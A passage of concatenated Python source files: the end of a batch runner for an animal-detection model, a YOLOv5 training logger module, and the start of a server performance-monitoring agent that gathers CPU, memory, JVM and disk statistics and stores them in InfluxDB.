'failure': FAILURE_IMAGE_OPEN
}
return result
try:
result = detector.generate_detections_one_image(
image, im_file, detection_threshold=confidence_threshold)
except Exception as e:
if not quiet:
print('Image {} cannot be processed. Exception: {}'.format(im_file, e))
result = {
'file': im_file,
'failure': FAILURE_INFER
}
return result
return result
#%% Main function
def load_and_run_detector_batch(model_file, image_file_names, checkpoint_path=None,
confidence_threshold=0, checkpoint_frequency=-1,
results=None, n_cores=0, use_image_queue=False, quiet=False):
"""
Args
- model_file: str, path to .pb model file
- image_file_names: list of str, paths to image files
- checkpoint_path: str, path to JSON checkpoint file
- confidence_threshold: float, only detections above this threshold are returned
- checkpoint_frequency: int, write results to JSON checkpoint file every N images
- results: list of dict, existing results loaded from checkpoint
- n_cores: int, # of CPU cores to use
Returns
- results: list of dict, each dict represents detections on one image
"""
if results is None:
results = []
already_processed = set([i['file'] for i in results])
print('GPU available: {}'.format(is_gpu_available(model_file)))
if n_cores > 1 and is_gpu_available(model_file):
print('Warning: multiple cores requested, but a GPU is available; parallelization across GPUs is not currently supported, defaulting to one GPU')
n_cores = 1
if n_cores > 1 and use_image_queue:
print('Warning: multiple cores requested, but the image queue is enabled; parallelization with the image queue is not currently supported, defaulting to one worker')
n_cores = 1
if use_image_queue:
assert n_cores <= 1
results = run_detector_with_image_queue(image_file_names, model_file, confidence_threshold, quiet)
elif n_cores <= 1:
# Load the detector
start_time = time.time()
detector = load_detector(model_file)
elapsed = time.time() - start_time
print('Loaded model in {}'.format(humanfriendly.format_timespan(elapsed)))
# Does not count those already processed
count = 0
for im_file in tqdm(image_file_names):
# Will not add additional entries not in the starter checkpoint
if im_file in already_processed:
if not quiet:
print('Bypassing image {}'.format(im_file))
continue
count += 1
result = process_image(im_file, detector, confidence_threshold, quiet=quiet)
results.append(result)
# Write a checkpoint if necessary
if checkpoint_frequency != -1 and count % checkpoint_frequency == 0:
print('Writing a new checkpoint after having processed {} images since last restart'.format(count))
assert checkpoint_path is not None
# Back up any previous checkpoints
checkpoint_tmp_path = None
if os.path.isfile(checkpoint_path):
checkpoint_tmp_path = checkpoint_path + '_tmp'
shutil.copyfile(checkpoint_path,checkpoint_tmp_path)
# Write the new checkpoint
with open(checkpoint_path, 'w') as f:
json.dump({'images': results}, f, indent=1)
# Remove the backup checkpoint if it exists
if checkpoint_tmp_path is not None:
os.remove(checkpoint_tmp_path)
# ...if it's time to make a checkpoint
else:
# When using multiprocessing, let the workers load the model
detector = model_file
print('Creating pool with {} cores'.format(n_cores))
if len(already_processed) > 0:
print('Warning: when using multiprocessing, all images are reprocessed')
pool = workerpool(n_cores)
image_batches = list(chunks_by_number_of_chunks(image_file_names, n_cores))
results = pool.map(partial(process_images, detector=detector,
confidence_threshold=confidence_threshold), image_batches)
results = list(itertools.chain.from_iterable(results))
# Results may have been modified in place, but we also return it for
# backwards-compatibility.
return results
def write_results_to_file(results, output_file, relative_path_base=None, detector_file=None):
"""
Writes list of detection results to JSON output file. Format matches
https://github.com/microsoft/CameraTraps/tree/master/api/batch_processing#batch-processing-api-output-format
Args
- results: list of dict, each dict represents detections on one image
- output_file: str, path to JSON output file, should end in '.json'
- relative_path_base: str, path to a directory as the base for relative paths
"""
if relative_path_base is not None:
results_relative = []
for r in results:
r_relative = copy.copy(r)
r_relative['file'] = os.path.relpath(r_relative['file'], start=relative_path_base)
results_relative.append(r_relative)
results = results_relative
info = {
'detection_completion_time': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),
'format_version': '1.1'
}
if detector_file is not None:
info['detector'] = os.path.basename(detector_file)
final_output = {
'images': results,
'detection_categories': DEFAULT_DETECTOR_LABEL_MAP,
'info': info
}
with open(output_file, 'w') as f:
json.dump(final_output, f, indent=1)
print('Output file saved at {}'.format(output_file))
#%% Interactive driver
if False:
pass
#%%
checkpoint_path = None
model_file = r'G:\temp\models\md_v4.1.0.pb'
confidence_threshold = 0.1
checkpoint_frequency = -1
results = None
ncores = 1
use_image_queue = True
quiet = False
image_dir = r'G:\temp\demo_images\ssmini'
image_file_names = image_file_names = ImagePathUtils.find_images(image_dir, recursive=False)
# image_file_names = image_file_names[0:2]
start_time = time.time()
# python run_detector_batch.py "g:\temp\models\md_v4.1.0.pb" "g:\temp\demo_images\ssmini" "g:\temp\ssmini.json" --recursive --output_relative_filenames --use_image_queue
results = load_and_run_detector_batch(model_file=model_file,
image_file_names=image_file_names,
checkpoint_path=checkpoint_path,
confidence_threshold=confidence_threshold,
checkpoint_frequency=checkpoint_frequency,
results=results,
n_cores=ncores,
use_image_queue=use_image_queue,
quiet=quiet)
elapsed = time.time() - start_time
print('Finished inference in {}'.format(humanfriendly.format_timespan(elapsed)))
#%% Command-line driver
def main():
parser = argparse.ArgumentParser(
description='Module to run a TF/PT animal detection model on lots of images')
parser.add_argument(
'detector_file',
help='Path to detector model file (.pb or .pt)')
parser.add_argument(
'image_file',
help='Path to a single image file, a JSON file containing a list of paths to images, or a directory')
parser.add_argument(
'output_file',
help='Path to output JSON results file, should end with a .json extension')
parser.add_argument(
'--recursive',
action='store_true',
help='Recurse into directories, only meaningful if image_file points to a directory')
parser.add_argument(
'--output_relative_filenames',
action='store_true',
help='Output relative file names, only meaningful if image_file points to a directory')
parser.add_argument(
'--quiet',
action='store_true',
help='Suppress per-image console output')
parser.add_argument(
'--use_image_queue',
action='store_true',
help='Pre-load images, may help keep your GPU busy; does not currently support checkpointing. Useful if you have a very fast GPU and a very slow disk.')
parser.add_argument(
'--threshold',
type=float,
default=DEFAULT_OUTPUT_CONFIDENCE_THRESHOLD,
help="Confidence threshold between 0 and 1.0, don't include boxes below this confidence in the output file. Default is 0.1")
parser.add_argument(
'--checkpoint_frequency',
type=int,
default=-1,
help='Write results to a temporary file every N images; default is -1, which disables this feature')
parser.add_argument(
'--checkpoint_path',
type=str,
default=None,
help='File name to which checkpoints will be written if checkpoint_frequency is > 0')
parser.add_argument(
'--resume_from_checkpoint',
help='Path to a JSON checkpoint file to resume from, must be in same directory as output_file')
parser.add_argument(
'--ncores',
type=int,
default=0,
help='Number of cores to use; only applies to CPU-based inference, does not support checkpointing when ncores > 1')
if len(sys.argv[1:]) == 0:
parser.print_help()
parser.exit()
args = parser.parse_args()
assert os.path.exists(args.detector_file), 'detector file {} does not exist'.format(args.detector_file)
assert 0.0 < args.threshold <= 1.0, 'Confidence threshold needs to be between 0 and 1' # Python chained comparison
assert args.output_file.endswith('.json'), 'output_file specified needs to end with .json'
if args.checkpoint_frequency != -1:
assert args.checkpoint_frequency > 0, 'Checkpoint_frequency needs to be > 0 or == -1'
if args.output_relative_filenames:
assert os.path.isdir(args.image_file), 'image_file must be a directory when --output_relative_filenames is set'
if os.path.exists(args.output_file):
print('Warning: output_file {} already exists and will be overwritten'.format(args.output_file))
# Load the checkpoint if available
#
# Relative file names are only output at the end; all file paths in the checkpoint are
# still full paths.
if args.resume_from_checkpoint:
assert os.path.exists(args.resume_from_checkpoint), 'File at resume_from_checkpoint specified does not exist'
with open(args.resume_from_checkpoint) as f:
saved = json.load(f)
assert 'images' in saved, \
'The file saved as checkpoint does not have the correct fields; cannot be restored'
results = saved['images']
print('Restored {} entries from the checkpoint'.format(len(results)))
else:
results = []
# Find the images to score; images can be a directory, may need to recurse
if os.path.isdir(args.image_file):
image_file_names = ImagePathUtils.find_images(args.image_file, args.recursive)
print('{} image files found in the input directory'.format(len(image_file_names)))
# A json list of image paths
elif os.path.isfile(args.image_file) and args.image_file.endswith('.json'):
with open(args.image_file) as f:
image_file_names = json.load(f)
print('{} image files found in the json list'.format(len(image_file_names)))
# A single image file
elif os.path.isfile(args.image_file) and ImagePathUtils.is_image_file(args.image_file):
image_file_names = [args.image_file]
print('A single image at {} is the input file'.format(args.image_file))
else:
raise ValueError('image_file specified is not a directory, a json list, or an image file, '
'(or does not have recognizable extensions).')
assert len(image_file_names) > 0, 'Specified image_file does not point to valid image files'
assert os.path.exists(image_file_names[0]), 'The first image to be scored does not exist at {}'.format(image_file_names[0])
output_dir = os.path.dirname(args.output_file)
if len(output_dir) > 0:
os.makedirs(output_dir,exist_ok=True)
assert not os.path.isdir(args.output_file), 'Specified output file is a directory'
# Test that we can write to the output_file's dir if checkpointing requested
if args.checkpoint_frequency != -1:
if args.checkpoint_path is not None:
checkpoint_path = args.checkpoint_path
else:
checkpoint_path = os.path.join(output_dir, 'checkpoint_{}.json'.format(datetime.utcnow().strftime("%Y%m%d%H%M%S")))
# Confirm that we can write to the checkpoint path, rather than failing after 10000 images
with open(checkpoint_path, 'w') as f:
json.dump({'images': []}, f)
print('The checkpoint file will be written to {}'.format(checkpoint_path))
else:
checkpoint_path = None
start_time = time.time()
results = load_and_run_detector_batch(model_file=args.detector_file,
image_file_names=image_file_names,
checkpoint_path=checkpoint_path,
confidence_threshold=args.threshold,
checkpoint_frequency=args.checkpoint_frequency,
results=results,
n_cores=args.ncores,
use_image_queue=args.use_image_queue,
quiet=args.quiet)
elapsed = time.time() - start_time
print('Finished inference for {} images in {}'.format(
len(results),humanfriendly.format_timespan(elapsed)))
relative_path_base = None
if args.output_relative_filenames:
relative_path_base = args.image_file
write_results_to_file(results, args.output_file, relative_path_base=relative_path_base,
detector_file=args.detector_file)
if checkpoint_path:
os.remove(checkpoint_path)
print('Deleted checkpoint file {}'.format(checkpoint_path))
print('Done!')
if __name__ == '__main__':
main()
|
__init__.py | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Logging utils
"""
import os
import warnings
from threading import Thread
import pkg_resources as pkg
import torch
from torch.utils.tensorboard import SummaryWriter
from utils.general import colorstr, emojis
from utils.loggers.wandb.wandb_utils import WandbLogger
from utils.plots import plot_images, plot_results
from utils.torch_utils import de_parallel
LOGGERS = ("csv", "tb", "wandb") # text-file, TensorBoard, Weights & Biases
RANK = int(os.getenv("RANK", -1))
try:
import wandb
assert hasattr(wandb, "__version__") # verify package import not local dir
if pkg.parse_version(wandb.__version__) >= pkg.parse_version("0.12.2") and RANK in [
0,
-1,
]:
wandb_login_success = wandb.login(timeout=30)
if not wandb_login_success:
wandb = None
except (ImportError, AssertionError):
wandb = None
class Loggers:
# YOLOv5 Loggers class
def __init__(
self,
save_dir=None,
weights=None,
opt=None,
hyp=None,
logger=None,
include=LOGGERS,
):
self.save_dir = save_dir
self.weights = weights
self.opt = opt
self.hyp = hyp
self.logger = logger # for printing results to console
self.include = include
self.keys = [
"train/box_loss",
"train/obj_loss",
"train/cls_loss", # train loss
"metrics/precision",
"metrics/recall",
"metrics/mAP_0.5",
"metrics/mAP_0.5:0.95", # metrics
"val/box_loss",
"val/obj_loss",
"val/cls_loss", # val loss
"x/lr0",
"x/lr1",
"x/lr2",
] # params
for k in LOGGERS:
setattr(self, k, None) # init empty logger dictionary
self.csv = True # always log to csv
# Message
if not wandb:
prefix = colorstr("Weights & Biases: ")
s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
print(emojis(s))
# TensorBoard
s = self.save_dir
if "tb" in self.include and not self.opt.evolve:
prefix = colorstr("TensorBoard: ")
self.logger.info(
f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/"
)
self.tb = SummaryWriter(str(s))
# W&B
if wandb and "wandb" in self.include:
wandb_artifact_resume = isinstance(
self.opt.resume, str
) and self.opt.resume.startswith("wandb-artifact://")
run_id = (
torch.load(self.weights).get("wandb_id")
if self.opt.resume and not wandb_artifact_resume
else None
)
self.opt.hyp = self.hyp # add hyperparameters
self.wandb = WandbLogger(self.opt, run_id)
else:
self.wandb = None
def on_pretrain_routine_end(self):
# Callback runs on pre-train routine end
paths = self.save_dir.glob("*labels*.jpg") # training labels
if self.wandb:
self.wandb.log(
{"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]}
)
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
# Callback runs on train batch end
if plots:
if ni == 0:
if (
not sync_bn
): # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
with warnings.catch_warnings():
warnings.simplefilter("ignore") # suppress jit trace warning
self.tb.add_graph(
torch.jit.trace(
de_parallel(model), imgs[0:1], strict=False
),
[],
)
if ni < 3:
f = self.save_dir / f"train_batch{ni}.jpg" # filename
Thread(
target=plot_images, args=(imgs, targets, paths, f), daemon=True
).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob("train*.jpg"))
self.wandb.log(
{
"Mosaics": [
wandb.Image(str(f), caption=f.name)
for f in files
if f.exists()
]
}
)
def on_train_epoch_end(self, epoch):
# Callback runs on train epoch end
if self.wandb:
self.wandb.current_epoch = epoch + 1
def on_val_image_end(self, pred, predn, path, names, im):
# Callback runs on val image end
if self.wandb:
self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
# Callback runs on val end
if self.wandb:
files = sorted(self.save_dir.glob("val*.jpg"))
self.wandb.log(
{"Validation": [wandb.Image(str(f), caption=f.name) for f in files]}
)
def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
# Callback runs at the end of each fit (train+val) epoch
x = {k: v for k, v in zip(self.keys, vals)} # dict
if self.csv:
file = self.save_dir / "results.csv"
n = len(x) + 1 # number of cols
s = (
""
if file.exists()
else (("%20s," * n % tuple(["epoch"] + self.keys)).rstrip(",") + "\n")
) # add header
with open(file, "a") as f:
f.write(s + ("%20.5g," * n % tuple([epoch] + vals)).rstrip(",") + "\n")
if self.tb:
for k, v in x.items():
self.tb.add_scalar(k, v, epoch)
if self.wandb:
self.wandb.log(x)
self.wandb.end_epoch(best_result=best_fitness == fi)
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
# Callback runs on model save event
if self.wandb:
if (
(epoch + 1) % self.opt.save_period == 0 and not final_epoch
) and self.opt.save_period != -1:
self.wandb.log_model(
last.parent, self.opt, epoch, fi, best_model=best_fitness == fi
)
def on_train_end(self, last, best, plots, epoch):
# Callback runs on training end
if plots:
plot_results(file=self.save_dir / "results.csv") # save results.png
files = [
"results.png",
"confusion_matrix.png",
*[f"{x}_curve.png" for x in ("F1", "PR", "P", "R")],
]
files = [
(self.save_dir / f) for f in files if (self.save_dir / f).exists()
] # filter
if self.tb:
import cv2
for f in files:
self.tb.add_image(
f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats="HWC"
)
if self.wandb:
self.wandb.log(
{"Results": [wandb.Image(str(f), caption=f.name) for f in files]}
)
# Calling wandb.log. TODO: Refactor this into WandbLogger.log_model
if not self.opt.evolve:
wandb.log_artifact(
str(best if best.exists() else last),
type="model",
name="run_" + self.wandb.wandb_run.id + "_model",
aliases=["latest", "best", "stripped"],
)
self.wandb.finish_run()
else:
self.wandb.finish_run()
self.wandb = WandbLogger(self.opt)
|
performance_monitor.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: leeyoshinari
import os
import re
import time
import json
import copy
import queue
import traceback
import threading
from concurrent.futures import ThreadPoolExecutor
import requests
import influxdb
from common import handle_exception, get_ip
from logger import logger, cfg
class PerMon(object):
def __init__(self):
self.check_sysstat_version()
self.IP = get_ip()
self.thread_pool = cfg.getAgent('threadPool') if cfg.getAgent('threadPool') >= 0 else 0
self._msg = {'port': [], 'pid': [], 'isRun': [], 'startTime': []} # port、pid、status、startTime
self.is_system = cfg.getMonitor('isMonSystem') # Whether to monitor the server system
self.error_times = cfg.getMonitor('errorTimes')
self.sleepTime = cfg.getMonitor('sleepTime')
self.maxCPU = cfg.getMonitor('maxCPU')
self.CPUDuration = cfg.getMonitor('CPUDuration')
self.isCPUAlert = cfg.getMonitor('isCPUAlert')
self.minMem = cfg.getMonitor('minMem')
self.isMemAlert = cfg.getMonitor('isMemAlert')
self.isPidAlert = cfg.getMonitor('isPidAlert')
self.errorTimesOfPid = cfg.getMonitor('errorTimesOfPid')
self.frequencyFGC = cfg.getMonitor('frequencyFGC')
self.isJvmAlert = cfg.getMonitor('isJvmAlert')
self.echo = cfg.getMonitor('echo')
self.isDiskAlert = cfg.getMonitor('isDiskAlert')
self.maxDiskUsage = cfg.getMonitor('maxDiskUsage') / 100
self.isTCP = cfg.getMonitor('isTCP')
self.timeSetting = cfg.getMonitor('timeSetting')
system_interval = cfg.getMonitor('systemInterval')
port_interval = cfg.getMonitor('portInterval')
self.system_interval = max(system_interval, 1) # If the set value is less than 1, the default is 1
self.port_interval = max(port_interval, 1) # If the set value is less than 1, the default is 1
self.system_interval = self.system_interval - 1.1 # Program running time
self.system_interval = max(self.system_interval, 0)
self.port_interval = self.port_interval - 1.03 # Program running time
self.port_interval = max(self.port_interval, 0)
self.system_version = '' # system version
self.cpu_info = ''
self.cpu_usage = 0.0 # CPU usage
self.cpu_cores = 0 # number of CPU core
self.mem_usage = 0.0 # memory usage
self.total_mem = 0 # totel memory, unit: G
self.total_mem_100 = 0 # total memory, unit: 100*G
self.nic = '' # network card
self.all_disk = [] # disk number
self.total_disk = 1 # total disk size, unit: M
self.total_disk_h = 0 # total disk size, unit:T or G
self.network_speed = cfg.getAgent('nicSpeed') # bandwidth
self.Retrans_num = self.get_RetransSegs() # TCP retrans number
self.get_system_version()
self.get_cpu_cores()
self.get_total_mem()
self.get_system_nic()
self.get_disks()
self.get_system_net_speed()
self.get_total_disk_size()
self.monitor_task = queue.Queue() # FIFO queue
# thread pool, +2 is the need for monitoring system and registration service
self.executor = ThreadPoolExecutor(self.thread_pool + 2)
self.client = influxdb.InfluxDBClient(cfg.getInflux('host'), cfg.getInflux('port'), cfg.getInflux('username'),
cfg.getInflux('password'), cfg.getInflux('database')) # influxdb connection
self.FGC = {} # full gc times
self.FGC_time = {} # full gc time
self.last_cpu_io = [] # recently cpu usage
self.is_java = {} # whether is java, 0 or 1
self.monitor()
@property
def start(self):
return self._msg
@start.setter
def start(self, value):
if value['port']:
self.is_java_server(value['port']) # Determine whether the port is java service
if value['port'] in self._msg['port']: # If the port has been monitored, update it
index = self._msg['port'].index(value['port'])
self._msg['pid'][index] = value['pid']
# If the monitoring has been stopped, update the monitoring status and start monitoring time
if self._msg['isRun'][index] == 0:
self._msg['isRun'][index] = value['is_run']
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
self.monitor_task.put((self.write_cpu_mem, index)) # Put the monitoring task into the queue
self.FGC[str(value['port'])] = 0 # reset FGC times
self.FGC_time[str(value['port'])] = [] # reset FGC time
if self.monitor_task.qsize() > 0: # If the queue is not empty, the monitoring status is set to 2
self._msg['isRun'][index] = 2 # queueing
else:
self._msg['isRun'][index] = value['is_run']
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
else:
self._msg['pid'].append(value['pid']) # If the port has not been monitored, add it
self._msg['port'].append(value['port'])
self._msg['isRun'].append(value['is_run'])
self._msg['startTime'].append(time.strftime('%Y-%m-%d %H:%M:%S'))
self.monitor_task.put((self.write_cpu_mem, len(self._msg['port'])-1)) # Put the monitoring task into the queue
self.FGC.update({str(value['port']): 0}) # initialize FGC times
self.FGC_time.update({str(value['port']): []}) # initialize FGC time
if self.monitor_task.qsize() > 0: # If the queue is not empty, the monitoring status is set to 2
self._msg['isRun'][-1] = 2 # queueing
else:
raise Exception('Parameter Exception')
@property
def stop(self):
return self._msg
@stop.setter
def stop(self, value):
index = self._msg['port'].index(value['port'])
self._msg['isRun'][index] = value['is_run']
def worker(self):
"""
Get data from the queue and start monitoring
:return:
"""
while True:
func, param = self.monitor_task.get()
func(param)
self.monitor_task.task_done()
def monitor(self):
"""
start monitoring
:return:
"""
for i in range(self.thread_pool + 2):
self.executor.submit(self.worker)
# Put registration and cleanup tasks in the queue
self.monitor_task.put((self.register_agent, True))
# Put the tasks of the monitoring system into the queue
self.monitor_task.put((self.write_system_cpu_mem, 1))
def write_cpu_mem(self, index):
"""
Monitoring port. CPU, Memory, jvm(Java), disk read and write
:param index: Subscript index of the port
:return:
"""
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S') # Update start monitoring time
jvm = 0.0 # Initialize jvm, used for non-java services
run_error_times = 0 # Initialize the times that the continuous failure to execute monitoring commands
port = self._msg['port'][index]
pid = self._msg['pid'][index]
is_run_jvm = self.is_java.get(str(port), 0)
line = [{'measurement': self.IP,
'tags': {'type': str(port)},
'fields': {
'cpu': 0.0,
'wait_cpu': 0.0,
'mem': 0.0,
'jvm': 0.0,
'rKbs': 0.0,
'wKbs': 0.0,
'iodelay': 0.0,
'tcp': 0,
'close_wait': 0,
'time_wait': 0
}}]
while True:
if self._msg['isRun'][index] > 0: # Start monitoring
self._msg['isRun'][index] = 1 # Reset the status to monitoring
try:
pid_info = self.get_pid_cpu_mem_io(pid) # get CPU, disk read and write
if not pid_info: # If the CPU usage rate is None, the monitoring command is executed wrong.
logger.warning(f'The CPU is NOne, the abnormal pid is {pid}')
pid = port_to_pid(port) # Query pid based on port
if pid: # If the pid exists, update it
self._msg['pid'][index] = pid
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
else:
run_error_times += 1
# If continuous execution commands fails, stop monitoring
if run_error_times > self.error_times:
self._msg['isRun'][index] = 0
logger.error(f'The port {port} fails to execute commands continuously within '
f'{self.error_times * self.sleepTime}s, and the monitoring has stopped.')
time.sleep(1)
break
if self.isPidAlert:
if run_error_times > self.errorTimesOfPid:
msg = f'The port {port} of the {self.IP} failed to execute commands continuously within ' \
f'{self.errorTimesOfPid * self.sleepTime}s, and the monitoring had been stopped.'
logger.warning(msg)
self._msg['isRun'][index] = 0
thread = threading.Thread(target=notification, args=(msg,)) # Start thread to send email
thread.start()
time.sleep(1)
break
time.sleep(self.sleepTime)
continue
line[0]['fields']['cpu'] = pid_info['cpu']
line[0]['fields']['wait_cpu'] = pid_info['wait_cpu']
line[0]['fields']['mem'] = pid_info['mem']
line[0]['fields']['rKbs'] = pid_info['kB_rd']
line[0]['fields']['wKbs'] = pid_info['kB_wr']
line[0]['fields']['iodelay'] = pid_info['iodelay']
tcp_num = self.get_port_tcp(port)
line[0]['fields']['tcp'] = tcp_num.get('tcp', 0)
line[0]['fields']['close_wait'] = tcp_num.get('close_wait', 0)
line[0]['fields']['time_wait'] = tcp_num.get('time_wait', 0)
if is_run_jvm:
jvm = self.get_jvm(port, pid) # get JVM size
line[0]['fields']['jvm'] = jvm
self.client.write_points(line) # write database
logger.info(f'cpu_and_mem: port_{port},pid_{pid},{pid_info},{jvm}')
run_error_times = 0 # If the monitoring command is executed successfully, reset it
except(Exception):
logger.error(traceback.format_exc())
time.sleep(self.sleepTime)
time.sleep(self.port_interval)
if self._msg['isRun'][index] == 0: # If status=0, stop monitoring
logger.info(f'Port {port} has been stopped monitoring.')
self.FGC[str(port)] = 0
self._msg['isRun'][index] = 0
break
def write_system_cpu_mem(self, is_system):
"""
Monitoring system. CPU, Memory, Disk IO, Network, TCP
:param is_system:
:return:
"""
cpu_flag = True # Flag of whether to send mail when the CPU usage is too high
mem_flag = True # Flag of whether to send mail when the free memory is too low
echo = True # Flag of whether to clean up cache
line = [{'measurement': self.IP,
'tags': {'type': 'system'},
'fields': {
'cpu': 0.0,
'iowait': 0.0,
'usr_cpu': 0.0,
'mem': 0.0,
'mem_available': 0.0,
'rec': 0.0,
'trans': 0.0,
'net': 0.0,
'tcp': 0,
'retrans': 0
}}]
for disk in self.all_disk:
# The system disks exists in the format of 'sda-1'. Since influxdb cannot recognize the '-', need to replace it.
# Other formats need to be verified
disk_n = disk.replace('-', '')
line[0]['fields'].update({disk_n: 0.0})
line[0]['fields'].update({disk_n + '_r': 0.0})
line[0]['fields'].update({disk_n + '_w': 0.0})
line[0]['fields'].update({disk_n + '_d': 0.0})
while True:
if self.is_system:
try:
res = self.get_system_cpu_io_speed() # get CPU, memory, IO, network, TCP
if res['disk'] and res['cpu'] is not None and res['mem'] is not None:
for k, v in res['disk'].items():
line[0]['fields'][k] = min(v, 100.0)
for k, v in res['disk_r'].items():
line[0]['fields'][k] = v
for k, v in res['disk_w'].items():
line[0]['fields'][k] = v
for k, v in res['disk_d'].items():
line[0]['fields'][k] = v
line[0]['fields']['cpu'] = res['cpu']
line[0]['fields']['iowait'] = res['iowait']
line[0]['fields']['usr_cpu'] = res['usr_cpu']
line[0]['fields']['mem'] = res['mem']
line[0]['fields']['mem_available'] = res['mem_available']
line[0]['fields']['rec'] = res['rece']
line[0]['fields']['trans'] = res['trans']
line[0]['fields']['net'] = res['network']
line[0]['fields']['tcp'] = res['tcp']
line[0]['fields']['retrans'] = res['retrans']
self.client.write_points(line) # write to database
logger.info(f"system: CpuAndMem,{res['cpu']},{res['mem']},{res['disk']},{res['disk_r']},"
f"{res['disk_w']},{res['rece']},{res['trans']},{res['network']}, "
f"{res['tcp']}, {res['retrans']}")
if len(self.last_cpu_io) > self.CPUDuration:
self.last_cpu_io.pop(0)
self.last_cpu_io.append(res['cpu'])
self.cpu_usage = sum(self.last_cpu_io) / len(self.last_cpu_io) # CPU usage, with %
self.mem_usage = 1 - res['mem'] / self.total_mem # Memory usage, without %
if self.cpu_usage > self.maxCPU:
msg = f'{self.IP} server CPU average usage is {self.cpu_usage}%, it is too high.'
logger.warning(msg)
if self.isCPUAlert and cpu_flag:
cpu_flag = False # Set to False to prevent sending email continuously
thread = threading.Thread(target=notification, args=(msg,))
thread.start()
else:
cpu_flag = True # If CPU usage is normally, reset it to True
if res['mem'] <= self.minMem:
msg = f"{self.IP} system free memory is {res['mem']}G, it is too low."
logger.warning(msg)
if self.isMemAlert and mem_flag:
mem_flag = False # Set to False to prevent sending email continuously
thread = threading.Thread(target=notification, args=(msg, ))
thread.start()
if self.echo and echo:
echo = False # Set to False to prevent cleaning up cache continuously
thread = threading.Thread(target=self.clear_cache, args=())
thread.start()
else:
mem_flag = True # If free memory is normally, reset it to True.
echo = True
except(Exception):
logger.error(traceback.format_exc())
time.sleep(self.system_interval)
else:
time.sleep(3)
@handle_exception(is_return=True, default_value=(None, None))
def get_cpu_mem(self, pid):
"""
Get CPU usage and Memory of pid. Now it is not used
:param pid: pid
:return: CPU usage(%), Memory(G)
"""
cpu = None
mem = None
# result = os.popen(f'top -n 1 -b -p {pid}').readlines()
result = os.popen(f'top -n 1 -b |grep -P {pid}').readlines()
res = [ress.split() for ress in result]
logger.debug(f'The CPU and Mem of pid {pid} is: {res}')
for r in res:
if str(pid) == r[0]:
ind = r.index(str(pid))
cpu = float(r[ind + 8]) / self.cpu_cores # CPU usage
mem = float(r[ind + 9]) * self.total_mem_100 # Memory
return cpu, mem
@handle_exception(is_return=True, default_value=[])
def get_pid_cpu_mem_io(self, pid):
"""
Get CPU usage, Memor, and disk of pid.
:param pid: pid
:return: CPU usage(%), Memory(G), Disk Read and Write(kB/s)
"""
pid_info = {'kB_rd': 0.0, 'kB_wr': 0.0, 'iodelay': 0.0, 'VSZ': 0.0, 'RSS': 0.0, 'mem': 0.0, 'usr_cpu': 0.0,
'system_cpu': 0.0, 'guest_cpu': 0.0, 'wait_cpu': 0.0, 'cpu': 0.0}
res = os.popen(f'pidstat -u -r -d -p {pid} 1 1').readlines()[::-1][:9]
if res:
for i in range(len(res)):
if 'iodelay' in res[i]:
io = res[i - 1].split()
pid_info['kB_rd'] = float(io[3]) / 1024 # Read from disk per second (kB)
pid_info['kB_wr'] = float(io[4]) / 1024 # Write to disk per second (kB)
# pid_info['iodelay'] = float(io[6]) # I/O delay(unit: clock cycle)
if 'MEM' in res[i]:
memory = res[i - 1].split()
# pid_info['VSZ'] = float(memory[5]) / 1024 # Virtual memory
# pid_info['RSS'] = float(memory[6]) / 1024 # Physical memory
pid_info['mem'] = float(memory[7]) * self.total_mem_100 # Memory size
if 'CPU' in res[i]:
cpu_res = res[i - 1].split()
# pid_info['usr_cpu'] = float(cpu_res[3]) / self.cpu_cores
# pid_info['system_cpu'] = float(cpu_res[4]) / self.cpu_cores
# pid_info['guest_cpu'] = float(cpu_res[5]) / self.cpu_cores
# pid_info['wait_cpu'] = float(cpu_res[6]) / self.cpu_cores # CPU usage waiting for context switch
pid_info['cpu'] = float(cpu_res[7]) / self.cpu_cores # CPU usage
return pid_info
else:
return res
@handle_exception(is_return=True, default_value=0)
def get_jvm(self, port, pid):
"""
JVM size
:param port: port
:param pid: pid
:return: jvm(G)
"""
result = os.popen(f'jstat -gc {pid}').readlines()[1]
res = result.strip().split()
logger.debug(f'The JVM of pid {pid} is: {res}')
mem = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7]) # calculate JVM
fgc = int(res[14])
if self.FGC[str(port)] < fgc: # If the times of FGC increases
self.FGC[str(port)] = fgc
self.FGC_time[str(port)].append(time.time())
if len(self.FGC_time[str(port)]) > 2: # Calculate FGC frequency
frequency = self.FGC_time[str(port)][-1] - self.FGC_time[str(port)][-2]
if frequency < self.frequencyFGC: # If FGC frequency is too high, send email.
msg = f'The Full GC frequency of port {port} is {frequency}, it is too high. Server IP: {self.IP}'
logger.warning(msg)
if self.isJvmAlert:
thread = threading.Thread(target=notification, args=(msg, ))
thread.start()
# Write FGC times and time to log
logger.warning(f"The port {port} has Full GC {self.FGC[str(port)]} times.")
elif self.FGC[str(port)] > fgc: # If the times of FGC is reduced, the port may be restarted, then reset it
self.FGC[str(port)] = 0
if self.FGC[str(port)] == 0: # If the times of FGC is 0, reset FGC time.
self.FGC_time[str(port)] = []
return mem / 1048576 # 1048576 = 1024 * 1024
@handle_exception(is_return=True, default_value={})
def get_system_cpu_io_speed(self):
"""
Get system CPU usage, memory, disk IO, network speed, etc.
:return:
"""
disk = {}
disk_r = {}
disk_w = {}
disk_d = {}
cpu = None
iowait = None
usr_cpu = None
bps1 = None
bps2 = None
rece = None
trans = None
network = None
if self.nic:
bps1 = os.popen(f'cat /proc/net/dev |grep {self.nic}').readlines()
logger.debug(f'The result of speed for the first time is: {bps1}')
